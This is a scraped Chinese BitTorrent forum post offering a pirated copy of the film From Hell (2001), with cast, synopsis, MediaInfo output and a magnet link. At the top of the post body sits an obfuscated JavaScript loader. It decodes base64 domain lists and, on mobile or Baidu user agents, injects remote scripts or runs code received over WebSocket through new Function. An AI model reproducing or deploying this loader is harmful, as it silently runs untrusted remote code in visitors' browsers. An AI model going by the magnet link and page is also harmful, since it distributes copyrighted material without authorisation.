来自地狱[中文字幕]From.Hell.2001.1080p.BluRay.DTS.x265-10bit-迅雷下载 12.38GB

版主小s 19天前 257

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 来自地狱 / 屠出地狱 / 开膛手 / 开膛手杰克

◎片 名 From Hell

◎年 代 2001

◎产 地 美国 / 捷克 / 英国

◎类 别 悬疑 / 惊悚 / 恐怖

◎语 言 英语

◎上映日期 2001-10-19(美国)

◎IMDb评分 6.8/10 from 148102 users

◎IMDb链接 https://www.imdb.com/title/tt0120681

◎豆瓣评分 7.2/10 from 28492 users

◎豆瓣链接 https://movie.douban.com/subject/1305248/

◎片 长 122分钟

◎导 演 艾尔伯特·休斯 Albert Hughes / 艾伦·休斯 Allen Hughes

◎编 剧 艾伦·摩尔 Alan Moore / 艾迪·坎贝尔 Eddie Campbell / 特里·海斯 Terry Hayes / 拉斐尔·依格雷西亚斯 Rafael Yglesias

◎主 演 约翰尼·德普 Johnny Depp

海瑟·格拉汉姆 Heather Graham

伊安·霍姆 Ian Holm

罗彼·考特拉尼 Robbie Coltrane

伊恩·理查森 Ian Richardson

杰森·弗莱明 Jason Flemyng

凯特琳·卡特利吉 Katrin Cartlidge

特伦斯·哈维 Terence Harvey

苏珊·林奇 Susan Lynch

保罗·瑞斯 Paul Rhys

莱斯利·夏普 Lesley Sharp

艾斯特尔·斯科妮 Estelle Skornik

尼古拉斯·麦克格 Nicholas McGaughey

安娜贝勒.艾裴逊 Annabelle Apsion

乔安娜·佩吉 Joanna Page

马克·德克斯特 Mark Dexter

丹尼·米德温特 Danny Midwinter

萨曼莎·斯毕洛 Samantha Spiro

大卫·斯科菲尔德 David Schofield

彼得·爱 Peter Eyre

克雷夫·珀瑞斯 Cliff Parisi

索菲娅·迈尔斯 Sophia Myles

拉尔夫·伊内森 Ralph Ineson

艾米·哈克 Amy Huck

鲁珀特·法利 Rupert Farley

唐纳德·道格拉斯 Donald Douglas

约翰·欧文斯 John Owens

伊恩·麦克尼奇 Ian McNeice

斯蒂夫·约翰·谢泼德 Steve John Shepherd

艾尔·阿什顿 Al Ashton

波比·罗杰斯 Poppy Rogers

Bruce Byron

梅拉妮·希尔 Melanie Hill

盖瑞·鲍威尔 Gary Powell

维森特·富兰克林 Vincent Franklin

詹姆斯·格林尼 James Greene

多米尼克·库珀 Dominic Cooper

凯里·萨林 Carey Thring

鲁珀特·霍利迪-埃文斯 Rupert Holliday-Evans

格伦·贝里 Glen Berry

史蒂芬·米尔顿 Stephen Milton

◎标 签 JohnnyDepp | 悬疑 | 惊悚 | 犯罪 | 美国 | 约翰尼·德普 | 美国电影 | 电影

◎简 介

贫穷混乱的伦敦街头,混杂着妓女和各色人物,玛丽(海瑟?格拉汉姆 Heather Graham饰)、安妮(乔安娜?佩姬 Joanna Page 饰)和其他几个妓女在这滩浑水中结成深厚友谊。然而,罪恶的魔爪正在伸向她们——这个躲在暗处的杀手,绑架甚至杀害这些姑娘。探员艾伯林接手这宗案件,他天生拥有超能力,这对他破案有着不小的作用。艾伯林(约翰尼?德普 Johnny Depp 饰)来到案发地区,渐渐掌握了线索,同时他也被玛丽善良的品质深深吸引,与她共坠爱河。但凶手的行动令妓女们陷入了恐慌之中,能否查出真凶,成为摆在艾伯林面前的迫切难题,而艾伯林也堕入了一个更大的漩涡之中,危机四伏。

  1. General

  2. Unique ID : 147762606040402216185938145803326690620 (0x6F2A0AF28AA39CC3C6A5F68D9B13953C)

  3. Complete name : From.Hell.2001.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.4 GiB

  7. Duration : 2 h 2 min

  8. Overall bit rate : 14.5 Mb/s

  9. Movie name : From Hell 2001 1080p BluRay DTS x265-10bit-HDS

  10. Encoded date : UTC 2021-07-06 00:04:21

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 2 min

  20. Bit rate : 13.0 Mb/s

  21. Width : 1 920 pixels

  22. Height : 812 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.347

  30. Stream size : 11.1 GiB (89%)

  31. Title : [email protected]

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 2 h 2 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.29 GiB (10%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 58 min

  61. Bit rate : 28.1 kb/s

  62. Count of elements : 2675

  63. Stream size : 23.8 MiB (0%)

  64. Title : CHS

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 58 min

  75. Bit rate : 28.7 kb/s

  76. Count of elements : 2675

  77. Stream size : 24.3 MiB (0%)

  78. Title : CHT

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Menu

  83. 00:00:00.000 : en:Chapter 01

  84. 00:02:00.746 : en:Chapter 02

  85. 00:07:19.814 : en:Chapter 03

  86. 00:10:17.075 : en:Chapter 04

  87. 00:15:16.666 : en:Chapter 05

  88. 00:18:20.891 : en:Chapter 06

  89. 00:21:23.532 : en:Chapter 07

  90. 00:25:49.798 : en:Chapter 08

  91. 00:31:51.243 : en:Chapter 09

  92. 00:36:35.568 : en:Chapter 10

  93. 00:41:14.972 : en:Chapter 11

  94. 00:45:23.638 : en:Chapter 12

  95. 00:47:52.787 : en:Chapter 13

  96. 00:53:05.349 : en:Chapter 14

  97. 00:56:15.789 : en:Chapter 15

  98. 00:59:33.403 : en:Chapter 16

  99. 01:03:02.987 : en:Chapter 17

  100. 01:07:36.177 : en:Chapter 18

  101. 01:11:29.577 : en:Chapter 19

  102. 01:16:17.823 : en:Chapter 20

  103. 01:19:29.598 : en:Chapter 21

  104. 01:20:53.473 : en:Chapter 22

  105. 01:25:21.908 : en:Chapter 23

  106. 01:26:31.186 : en:Chapter 24

  107. 01:32:43.266 : en:Chapter 25

  108. 01:34:33.835 : en:Chapter 26

  109. 01:38:58.933 : en:Chapter 27

  110. 01:40:27.146 : en:Chapter 28

  111. 01:45:57.017 : en:Chapter 29

  112. 01:49:40.115 : en:Chapter 30

  113. 01:51:48.994 : en:Chapter 31

  114. 01:55:38.556 : en:Chapter 32


TAGS 惊悚 恐怖 悬疑

磁力链:
  • magnet:?xt=urn:btih:1584A3EE35120366210DB36F14D7E947244D00CA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回